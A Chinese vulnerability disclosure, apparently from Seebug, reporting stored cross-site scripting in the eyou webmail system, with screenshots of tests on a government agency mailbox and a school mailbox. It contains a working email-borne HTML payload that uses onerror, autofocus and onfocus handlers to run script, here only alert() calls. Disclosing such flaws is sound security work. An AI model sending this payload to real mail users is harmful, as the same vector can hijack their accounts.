### 简要描述:
eyou邮件系统邮箱多为政府和学校使用,经测试存在xss。
### 详细说明:
由于eyou版本号不同,下面测试代码的效果也有细微区别,但是存在漏洞原因相同。
测试代码:
`<!--[if true]><img onerror=alert(1) src=--><form action=javascript:alert(2)><input type=submit><input autofocus onfocus=alert(3)><select autofocus onfocus=alert(4)><textarea autofocus onfocus=alert(5)>`发送后打开,效果如图:
某党政机关邮箱:
[<img src="https://images.seebug.org/upload/201501/21142423aaff08c3c4de487e3736a2a1f9813340.jpg" alt="QQ图片eyou120150121142357.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/21142423aaff08c3c4de487e3736a2a1f9813340.jpg)
[<img src="https://images.seebug.org/upload/201501/21142621f4bd7e4c43734019aa937932a99f4165.jpg" alt="QQ图片eyou220150121142545.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/21142621f4bd7e4c43734019aa937932a99f4165.jpg)
某院校邮箱:
[<img src="https://images.seebug.org/upload/201501/21142750698fd56e679543b6885f9fbf48a7ff4a.jpg" alt="QQ图片eyou320150121142724.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/21142750698fd56e679543b6885f9fbf48a7ff4a.jpg)
### 漏洞证明:
由于eyou版本号不同,下面测试代码的效果也有细微区别,但是存在漏洞原因相同。
测试代码:
`<!--[if true]><img onerror=alert(1) src=--><form action=javascript:alert(2)><input type=submit><input autofocus onfocus=alert(3)><select autofocus onfocus=alert(4)><textarea autofocus onfocus=alert(5)>`发送后打开,效果如图:
某党政机关邮箱:
[<img src="https://images.seebug.org/upload/201501/21142423aaff08c3c4de487e3736a2a1f9813340.jpg" alt="QQ图片eyou120150121142357.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/21142423aaff08c3c4de487e3736a2a1f9813340.jpg)
[<img src="https://images.seebug.org/upload/201501/21142621f4bd7e4c43734019aa937932a99f4165.jpg" alt="QQ图片eyou220150121142545.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/21142621f4bd7e4c43734019aa937932a99f4165.jpg)
某院校邮箱:
[<img src="https://images.seebug.org/upload/201501/21142750698fd56e679543b6885f9fbf48a7ff4a.jpg" alt="QQ图片eyou320150121142724.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/21142750698fd56e679543b6885f9fbf48a7ff4a.jpg)
暂无评论